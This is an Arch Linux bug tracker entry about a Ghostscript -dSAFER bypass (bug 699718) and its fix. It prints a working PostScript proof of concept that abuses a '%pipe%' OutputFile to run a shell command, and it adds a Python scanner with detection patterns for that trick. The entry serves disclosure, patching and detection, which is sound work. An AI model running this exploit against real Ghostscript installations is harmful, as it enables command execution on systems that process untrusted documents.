FS#59982 - [ghostscript] Add fixes for yet another exploit [bug: 699718]

Attached to Project: Arch Linux
Opened by Tommy Schmitt (spinka) - Saturday, 08 September 2018, 11:03 GMT
Last edited by Andreas Radke (AndyRTR) - Sunday, 09 September 2018, 12:14 GMT
Task Type Bug Report
Category Packages: Extra
Status Closed
Assigned To Andreas Radke (AndyRTR)
Architecture All
Severity Critical
Priority Normal
Reported Version
Due in Version Undecided
Due Date Undecided
Percent Complete 100%
Votes 1
Private No

Details

Description:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1640#c25

The following patches should fix this:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002
Steps to reproduce:
$ cat bug699718.txt
%!PS
% This is bug 699718, trysetparams stopped proc can itself stop, leaving page device in insecure state
currentpagedevice /PageSize get 0 (foobar) put
a0
% fill up the stack with junk, so the error handler generates a /stackoverflow
0 1 300360 {} for
{ grestore } stopped clear
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

$ gs -dSAFER bug699718.txt
GPL Ghostscript GIT PRERELEASE 9.25 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
uid=1000(user) gid=100(users)
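The PoC above turns Ghostscript's own output path into a shell command (`/OutputFile (%pipe%id)`), and `-dSAFER` alone did not stop it on the unpatched build. The only real fix is the patched package, but a gateway that accepts PostScript from untrusted sources can also screen files before handing them to `gs`. The scanner below is an added example written for this report, not code from Ghostscript, Artifex, or Arch; the detection patterns are my own heuristic, and the two sample documents are constructed (the suspicious one mirrors the shape of the PoC quoted above). It takes care to strip PostScript comments while keeping `%` inside `( ... )` strings, because a naive `split("%")` would hide exactly the `%pipe%` token we are looking for.

```python
import re

# Constructed sample inputs (not taken from any real submission).
SUSPICIOUS_PS = """%!PS
currentpagedevice /PageSize get 0 (foobar) put
{ grestore } stopped clear
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
"""

BENIGN_PS = """%!PS
/Helvetica findfont 12 scalefont setfont
72 72 moveto (Hello) show
showpage
"""

# Ghostscript treats an OutputFile beginning with %pipe% as a command to run.
PIPE_DEVICE = re.compile(r"\(\s*%pipe%")
# OutputFile being rewritten at run time through the device-property operators.
OUTPUTFILE_SET = re.compile(r"/OutputFile\b.*\b(putdeviceprops|setpagedevice)\b")
# A device switch on its own is common in legitimate jobs; reported as context only.
DEVICE_SWITCH = re.compile(r"\b(selectdevice|setdevice)\b")


def strip_comments(line: str) -> str:
    """Drop a trailing '%' comment, but keep '%' that sits inside a (...) string.

    Tracks parenthesis depth and honours backslash escapes inside strings,
    which is enough for line-oriented screening (multi-line strings are rare
    in page-setup code and are simply passed through).
    """
    depth = 0
    i = 0
    while i < len(line):
        c = line[i]
        if c == "\\" and depth > 0:
            i += 2  # skip the escaped character inside a string literal
            continue
        if c == "(":
            depth += 1
        elif c == ")" and depth > 0:
            depth -= 1
        elif c == "%" and depth == 0:
            return line[:i]
        i += 1
    return line


def scan_postscript(text: str) -> list[tuple[int, str]]:
    """Return (line number, finding kind) pairs for a PostScript document."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = strip_comments(raw)
        if PIPE_DEVICE.search(line):
            findings.append((lineno, "pipe-device-path"))
        if OUTPUTFILE_SET.search(line):
            findings.append((lineno, "runtime-outputfile-rewrite"))
        if DEVICE_SWITCH.search(line):
            findings.append((lineno, "device-switch"))
    return findings


def is_suspicious(text: str) -> bool:
    """Only the two OutputFile-related findings are treated as blocking."""
    kinds = {kind for _, kind in scan_postscript(text)}
    return "pipe-device-path" in kinds or "runtime-outputfile-rewrite" in kinds


if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_PS), ("benign", BENIGN_PS)):
        print(name, is_suspicious(doc), scan_postscript(doc))
```

A match here should quarantine the file for review rather than silently drop it, and a clean result says nothing about other sandbox bypasses: the scanner complements the upgrade to a patched Ghostscript, it does not replace it.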
This task depends upon

Closed by Andreas Radke (AndyRTR)
Sunday, 09 September 2018, 12:14 GMT
Reason for closing: Fixed
Comment by Andreas Radke (AndyRTR) - Sunday, 09 September 2018, 08:40 GMT
Try 9.24-6 with both commit patches applied.
Comment by Tommy Schmitt (spinka) - Sunday, 09 September 2018, 11:40 GMT
I can confirm it blocks the latest PoC:

$ gs -dSAFER bug699718.txt
GPL Ghostscript 9.24 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Error: /invalidaccess in --setdevice--
Operand stack:
--nostringval--
Execution stack:
%interp_exit .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- --nostringval-- false 1 %stopped_push 2015 1 3 %oparray_pop 2014 1 3 %oparray_pop 1998 1 3 %oparray_pop 1884 1 3 %oparray_pop --nostringval-- %errorexec_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- 1886 1 3 %oparray_pop --nostringval--
Dictionary stack:
--dict:966/1684(ro)(G)-- --dict:0/20(G)-- --dict:78/200(L)--
Current allocation mode is local
Last OS error: Resource temporarily unavailable
Current file position is 304
GPL Ghostscript 9.24: Unrecoverable error, exit code 1